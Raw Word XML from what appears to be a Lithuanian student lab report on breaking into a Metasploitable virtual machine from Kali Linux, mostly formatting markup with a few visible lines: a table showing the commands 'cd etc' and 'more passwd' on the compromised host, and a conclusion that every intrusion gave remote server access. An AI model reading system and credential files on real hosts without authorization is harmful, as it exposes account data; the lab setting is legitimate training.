              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="41E31E7B" w14:textId="36ED3383" w:rsidR="009E49CB" w:rsidRDefault="003F57F6" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44DE0726" wp14:editId="14C51F7D">
                  <wp:extent cx="1676400" cy="361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76400" cy="361950"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E49CB" w:rsidRPr="00607DC0" w14:paraId="787D866A" w14:textId="77777777" w:rsidTr="009E49CB">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77F9DF88" w14:textId="414B151E" w:rsidR="009E49CB" w:rsidRPr="009E49CB" w:rsidRDefault="003F57F6" w:rsidP="003F57F6">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>cd etc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4801649C" w14:textId="448592F8" w:rsidR="009E49CB" w:rsidRDefault="003F57F6" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53640684" wp14:editId="3F5AC84D">
                  <wp:extent cx="25717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1750" cy="314325"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E49CB" w:rsidRPr="00607DC0" w14:paraId="3D34D709" w14:textId="77777777" w:rsidTr="003F57F6">
        <w:trPr>
          <w:trHeight w:val="2177"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DC44600" w14:textId="3612E117" w:rsidR="009E49CB" w:rsidRPr="009E49CB" w:rsidRDefault="003F57F6" w:rsidP="003F57F6">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>more passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="027EBBD5" w14:textId="77777777" w:rsidR="009E49CB" w:rsidRDefault="003F57F6" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E81BE25" wp14:editId="12686883">
                  <wp:extent cx="3937000" cy="549275"/>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7000" cy="549275"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DBE6BA7" w14:textId="29DDC081" w:rsidR="003F57F6" w:rsidRDefault="003F57F6" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B2EE81C" wp14:editId="118B4C72">
                  <wp:extent cx="2990850" cy="819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0850" cy="819150"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EDBA62F" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc258656094"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:p w14:paraId="2E2C056C" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IŠVADOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17889B4F" w14:textId="77777777" w:rsidR="006F17EE" w:rsidRPr="00607DC0" w:rsidRDefault="006F17EE" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="769"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EBAE72F" w14:textId="1E0A0A2C" w:rsidR="006F17EE" w:rsidRPr="00607DC0" w:rsidRDefault="008C620B" w:rsidP="008C620B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pateiktus laboratorinio darbo įsilaužimus pavyko atkartoti be komplikacijų. Darbo metu buvo naudojamos dvi virtualios mašinos: „Kali linux“ ir „Metasploit“. Pirmoji virtualioji mašina buvo naudojamas kaip įrankis įsilaužti į antrtają virtualią mašiną.</w:t>
      </w:r>
      <w:r w:rsidR="00C222C5">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Taip pat buvo pastebėta kad yra ne veinas būdas, kaip galima įsilaužti į kitą sistemą, jeigu turi reikiamus duomenis apie sistemą. Atlikus pateiktus įsilaužimus į sistemą, visi įsilaužimai privedė prie serverio nuotolinės prieigos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46226DEC" w14:textId="16A2509A" w:rsidR="00CA78BB" w:rsidRPr="00607DC0" w:rsidRDefault="00CA78BB" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CA78BB" w:rsidRPr="00607DC0" w:rsidSect="005757BE">
      <w:footerReference w:type="even" r:id="rId46"/>
      <w:footerReference w:type="default" r:id="rId47"/>
      <w:pgSz w:w="11900" w:h="16840"/>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A2BFD" w14:textId="77777777" w:rsidR="00B45BD6" w:rsidRDefault="00B45BD6" w:rsidP="009A677B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0F2E6C74" w14:textId="77777777" w:rsidR="00B45BD6" w:rsidRDefault="00B45BD6" w:rsidP="009A6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4D36E" w14:textId="77777777" w:rsidR="009A677B" w:rsidRDefault="009B7A36" w:rsidP="00BC5548">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:framePr w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="right" w:y="1"/>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="009A677B">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE  </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="02AFD983" w14:textId="77777777" w:rsidR="009A677B" w:rsidRDefault="009A677B" w:rsidP="009A67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B9BD5" w14:textId="77777777" w:rsidR="009A677B" w:rsidRDefault="009B7A36" w:rsidP="00BC5548">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:framePr w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="right" w:y="1"/>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="009A677B">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE  </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00C60AE6">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="4A65E93F" w14:textId="77777777" w:rsidR="009A677B" w:rsidRDefault="009A677B" w:rsidP="009A67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BAC6C" w14:textId="77777777" w:rsidR="00B45BD6" w:rsidRDefault="00B45BD6" w:rsidP="009A677B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1A3919C5" w14:textId="77777777" w:rsidR="00B45BD6" w:rsidRDefault="00B45BD6" w:rsidP="009A6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6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="00000006"/>
    <w:name w:val="WW8Num6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="094E25CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E7E713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C97A5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EDA09A6"/>
    <w:lvl w:ilvl="0" w:tplc="A1F834B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DD140A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3286B186"/>
    <w:lvl w:ilvl="0" w:tplc="EF52D812">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="EF52D812">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>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17903160"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4F812A4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="644" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>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cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="108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800" w:hanging="144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2160" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="22164E15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BA0BFCC"/>
    <w:lvl w:ilvl="0" w:tplc="04270001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="644" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04270019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1364" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0427001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2084" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0427000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2804" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04270019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3524" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0427001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4244" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0427000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4964" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04270019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5684" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0427001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6404" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="28AF6A80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81D66F06"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>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CB0131A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB0690C4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="MAG-3"/>
      <w:isLgl/>
      <w:lvlText w:val="6.%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80D7746"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D69CB846"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="MAG-2"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="216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560" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8640" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="40C17BF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E36EE74"/>
    <w:lvl w:ilvl="0" w:tplc="EF52D812">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="50267F3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D08980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B203177"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="458A536E"/>
    <w:lvl w:ilvl="0" w:tplc="000C484C">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717869"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26D4E60A"/>
    <w:lvl w:ilvl="0" w:tplc="EF52D812">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1364" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04270003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2084" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04270005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2804" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04270001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3524" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04270003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4244" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04270005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4964" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04270001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5684" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04270003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6404" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04270005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7124" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="620C2A87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84787D28"/>
    <w:lvl w:ilvl="0" w:tplc="EF52D812">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
      </w:r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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="79E1062A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="471460EA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="644" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>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cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
